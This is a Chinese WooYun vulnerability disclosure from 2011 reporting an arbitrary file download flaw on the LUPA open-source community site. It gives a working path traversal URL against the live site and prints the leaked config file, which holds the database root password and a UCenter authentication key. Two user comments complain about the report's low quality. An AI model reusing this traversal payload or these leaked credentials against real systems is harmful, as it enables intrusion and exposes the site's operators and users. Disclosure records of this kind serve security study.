当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2011-02510

漏洞标题:LUPA开源社区源码泄露

相关厂商:LUPA开源社区

漏洞作者: t00000by57

提交时间:2011-07-16 13:26

修复时间:2011-07-18 00:46

公开时间:2011-07-18 00:46

漏洞类型:任意文件遍历/下载

危害等级:中

自评Rank:5

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2011-07-16: 积极联系厂商并且等待厂商认领中,细节不对外公开
2011-07-18: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

我很无聊

详细说明:

http://www.lupaworld.com/code.php?mod=list&itemid=&path=/test&file=../../config/config_ucenter.php

漏洞证明:

1.   <?php
2.  
3.  
4.   define('UC_CONNECT', 'mysql');
5.  
6.   #define('UC_DBHOST', '192.168.1.10');
7.   define('UC_DBHOST', 'localhost');
8.   define('UC_DBUSER', 'root');
9.   define('UC_DBPW', '84636882');
10.   define('UC_DBNAME', 'lupa_www71');
11.   define('UC_DBCHARSET', 'utf8');
12.   define('UC_DBTABLEPRE', '`lupa_www71`.pre_ucenter_');
13.   define('UC_DBCONNECT', 0);
14.  
15.   define('UC_CHARSET', 'utf-8');
16.   define('UC_KEY', '1fG4v2c0Bdc94aM1Q8xcM4uac4M5I354ven4x0ecqcC7gef3v5c6fd86x1fey5p7');
17.   define('UC_API', 'http://www.lupaworld.com/uc_server');
18.   define('UC_APPID', '1');
19.   define('UC_IP', '127.0.0.1');
20.   define('UC_PPP', 20);
21.

修复方案:

basename

版权声明:转载请注明来源 t00000by57@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞Rank:5 (WooYun评价)

漏洞评价:

评论

  1. 2011-07-18 21:42 | 鬼色[N.S.T] ( 普通白帽子 | Rank:130 漏洞数:18 | 雷州半岛)

    要严格控制漏洞的质量!!!!!!!!!是不是乌云的管理员人手不够??????

  2. 2011-07-18 21:45 | 鬼色[N.S.T] ( 普通白帽子 | Rank:130 漏洞数:18 | 雷州半岛)

    首次注册很重要,不是乱发漏洞都可以拿到邀请码!!!!